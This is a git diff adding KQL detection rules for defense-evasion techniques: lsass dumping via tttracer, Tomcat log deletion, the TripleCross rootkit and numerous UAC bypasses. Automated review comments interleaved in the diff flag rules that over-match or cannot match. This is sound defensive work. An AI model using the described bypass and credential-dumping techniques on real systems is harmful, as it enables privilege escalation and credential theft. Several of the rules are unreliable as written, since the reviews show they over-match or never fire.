+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+// - Legitimate usage by software developers/testers
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql
new file mode 100644
index 00000000..43170943
--- /dev/null
+++ b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql
@@ -0,0 +1,13 @@
+// Title: Tomcat WebServer Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-16
+// Level: medium
+// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - During uninstallation of the tomcat server
+// - During log rotation
+
+DeviceFileEvents
+| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql
new file mode 100644
index 00000000..4400edb6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql
@@ -0,0 +1,12 @@
+// Title: Touch Suspicious Service File
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects usage of the "touch" process in service file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+// False Positives:
+// - Admin changing date of files.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -t " and ProcessCommandLine endswith ".service" and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql
new file mode 100644
index 00000000..ba212f6e
--- /dev/null
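Review bot: The Tomcat rule runs over `DeviceFileEvents` without restricting `ActionType`, so routine appends to `catalina.*` or `localhost_access_log.*` under `\Tomcat*\logs\` satisfy the `where` clause, and the listed 'log rotation' false positive becomes every write to the log directory rather than an edge case. Add `and ActionType == "FileDeleted"` to the `where` clause so only the deletion named in the title is reported; the `_access_log.` and `localhost.` substrings are loose enough that the deletion filter is what keeps this rule usable at 'medium'.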
+++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Default LockFile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath =~ "/tmp/rootlog"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql
new file mode 100644
index 00000000..5819904a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Execve Hijack
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "execve_hijack" and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql
new file mode 100644
index 00000000..052ac224
--- /dev/null
+++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Install Commands
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1014
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " qdisc " or ProcessCommandLine contains " filter ") and (ProcessCommandLine contains " tc " and ProcessCommandLine contains " enp0s3 ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql
new file mode 100644
index 00000000..3a60172f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql
new file mode 100644
index 00000000..237dc504
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql
new file mode 100644
index 00000000..c63c2b85
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql
new file mode 100644
index 00000000..1f5f92b5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Tools Using ComputerDefaults
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-31
+// Level: high
+// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql
new file mode 100644
index 00000000..35ea1430
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using ChangePK and SLUI
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql
new file mode 100644
index 00000000..266f342a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Consent and Comctl32 - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql
new file mode 100644
index 00000000..39b6db8d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Consent and Comctl32 - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql
new file mode 100644
index 00000000..8dc93f97
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Disk Cleanup
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql
new file mode 100644
index 00000000..e650ff3c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using DismHost
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql
new file mode 100644
index 00000000..de4e7f10
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql
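Review bot: `InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"` is an exact match that requires the parent's full path in the command line; in MDE process events the svchost command line is commonly recorded as it was passed (`svchost.exe -k netsvcs -p -s Schedule`, no directory), in which case this rule would never fire. Relaxing it to `InitiatingProcessCommandLine endswith "svchost.exe -k netsvcs -p -s Schedule"`, or to `InitiatingProcessFileName =~ "svchost.exe" and InitiatingProcessCommandLine has_all ("-k netsvcs", "-s Schedule")`, keeps the Schedule-service parent constraint without depending on the recorded form. I am inferring the recorded form from the table rather than from this diff, so check a sample event before merging.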
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Event Viewer RecentViews
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-22
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql
new file mode 100644
index 00000000..881fc302
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using EventVwr
+// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql
new file mode 100644
index 00000000..58e853ed
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IEInstal - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql
new file mode 100644
index 00000000..b753c6eb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IEInstal - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql
new file mode 100644
index 00000000..1f1e1bca
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Iscsicpl - ImageLoad
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: high
+// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql
new file mode 100644
index 00000000..5584d8b8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using MSConfig Token Modification - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql
new file mode 100644
index 00000000..b775b5fa
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using MSConfig Token Modification - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql
new file mode 100644
index 00000000..f206c78d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using .NET Code Profiler on MMC
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql
new file mode 100644
index 00000000..d728f4ad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using NTFS Reparse Point - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql
new file mode 100644
index 00000000..0b5ad53c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using NTFS Reparse Point - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql
new file mode 100644
index 00000000..049383b1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using PkgMgr and DISM
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql
new file mode 100644
index 00000000..15db9392
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql
new file mode 100644
index 00000000..2e3560fd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")) and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql
new file mode 100644
index 00000000..87e58977
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql
new file mode 100644
index 00000000..d3e1ed50
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Event Viewer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects UAC bypass method using Windows event viewer
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql
new file mode 100644
index 00000000..1e0a1a80
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql
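Review bot: `RegistryKey endswith "...\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"` folds a Sysmon TargetObject (key path plus value name) into the MDE RegistryKey column, which carries only the key path, so this predicate cannot match; the value name belongs in RegistryValueName, e.g. `| where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store" and RegistryValueName =~ "C:\\Program Files\\Windows Media Player\\osk.exe"`. `RegistryValueData =~ "Binary Data"` is likewise the Sysmon Details placeholder and presumably never appears in DeviceRegistryEvents; if a type check is wanted it would go on RegistryValueType. The same TargetObject-to-RegistryKey mapping affects the Sdclt hunk (`isolatedCommand` and `SymbolicLinkValue` are value names) and the Keyboard Layout IME hunk (`RegistryKey contains "Ime File"`), so the fix most likely belongs in the converter's field mapping rather than in each generated file.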
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via ICMLuaUtil
+// Author: Florian Roth (Nextron Systems), Elastic (idea)
+// Date: 2022-09-13
+// Level: high
